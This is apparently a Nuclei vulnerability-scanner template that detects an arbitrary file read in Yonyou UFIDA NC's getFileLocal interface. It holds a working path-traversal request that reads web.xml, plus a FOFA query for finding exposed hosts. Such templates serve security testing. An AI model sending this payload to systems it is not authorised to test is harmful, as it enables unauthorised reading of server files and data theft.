id: yonyou-ufida-nc-lfi

info:
  name: UFIDA NC Portal - Arbitrary File Read
  author: DhiyaneshDk
  severity: high
  description: |
    There is any file reading in the getFileLocal interface of UFIDA Mobile System Management.
  reference:
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8B%E7%A7%BB%E5%8A%A8%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86getFileLocal%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.md
  classification:
    cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: yonyou
    product: ufida-nc
    fofa-query: app="用友-移动系统管理"
  tags: yonyou,ufida,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "nc.bs.framework.server.WebApplicationStartupHook"
          - "<web-app"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202dbf3663221b5b52046f5c321968dbb3de8a1b250bebb2591c4e65fd4a13b1300221008cbe341cfe12bcd78c4f479f2edb4e1e2545e2163695a437c470e2596c04936b:922c64590222798bb761d5b6d8e72950